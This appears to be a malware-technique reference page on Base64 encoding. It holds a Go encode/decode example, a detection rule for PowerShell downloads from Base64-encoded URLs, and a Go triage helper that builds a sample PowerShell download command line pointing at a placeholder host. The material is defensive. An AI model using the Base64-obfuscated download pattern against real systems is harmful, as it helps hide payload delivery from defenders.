Base64

Base64 is used to represent binary data as an ASCII string. It is a simple encoding and is commonly found in malware.

U0706

Code Snippets

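package main

import (
    "encoding/base64"
    "fmt"
    "os"
)

func main() {
    // Require the string to encode as the first argument.
    if len(os.Args) < 2 {
        fmt.Fprintf(os.Stderr, "usage: %s <string>\n", os.Args[0])
        os.Exit(1)
    }
    arg1 := os.Args[1]

    // Encode the argument with the standard Base64 alphabet.
    encoded := base64.StdEncoding.EncodeToString([]byte(arg1))
    fmt.Println(encoded)

    // Decode it again to show the round trip.
    decoded, err := base64.StdEncoding.DecodeString(encoded)
    if err != nil {
        panic(err)
    }
    fmt.Println(string(decoded))
}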

Detection Rules

title: Powershell download file from base64 url
status: experimental
description: Powershell download file from base64 url
author: Joe Security
date: 2020-04-13
id: 200072
threatname:
behaviorgroup: 1
classification: 8
mitreattack:

logsource:
      category: process_creation
      product: windows
detection:
      selection:
          CommandLine:
              - '*.downloadfile([system.text.encoding]::ascii.getstring([system.convert]::frombase64string(*'
      condition: selection
level: critical
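
A triage helper for hits on the rule above, as an added example that is not part of the original page or of Joe Security's rule: it decodes every Base64-looking run in a command line and reports the ones whose plaintext is an http(s) URL. The function names, the 16-character minimum and the constructed sample command line with its placeholder URL are assumptions made for illustration.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"regexp"
	"strings"
)

// candidate matches runs that look like standard Base64: 16 or more
// alphabet characters (an assumed threshold) with optional padding.
var candidate = regexp.MustCompile(`[A-Za-z0-9+/]{16,}={0,2}`)

// FindBase64URLs decodes each Base64-looking run in cmdline and returns
// the decoded values that are http(s) URLs.
func FindBase64URLs(cmdline string) []string {
	var urls []string
	for _, tok := range candidate.FindAllString(cmdline, -1) {
		raw, err := base64.StdEncoding.DecodeString(tok)
		if err != nil {
			continue // wrong length or padding: not valid Base64
		}
		// Identifiers such as "frombase64string" also decode cleanly,
		// so only keep plaintext that starts like a URL.
		text := strings.ToLower(string(raw))
		if strings.HasPrefix(text, "http://") || strings.HasPrefix(text, "https://") {
			urls = append(urls, string(raw))
		}
	}
	return urls
}

// SampleCommandLine builds a constructed process_creation command line in
// the shape the rule matches; value is Base64-encoded into the argument.
func SampleCommandLine(value string) string {
	b64 := base64.StdEncoding.EncodeToString([]byte(value))
	return "powershell.exe -c (new-object net.webclient).downloadfile(" +
		"[system.text.encoding]::ascii.getstring([system.convert]::frombase64string('" +
		b64 + "')),'out.bin')"
}

func main() {
	cmd := SampleCommandLine("http://example.invalid/file.bin") // placeholder URL
	fmt.Println(cmd)
	fmt.Println(FindBase64URLs(cmd))
}
```
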

Additional Resources
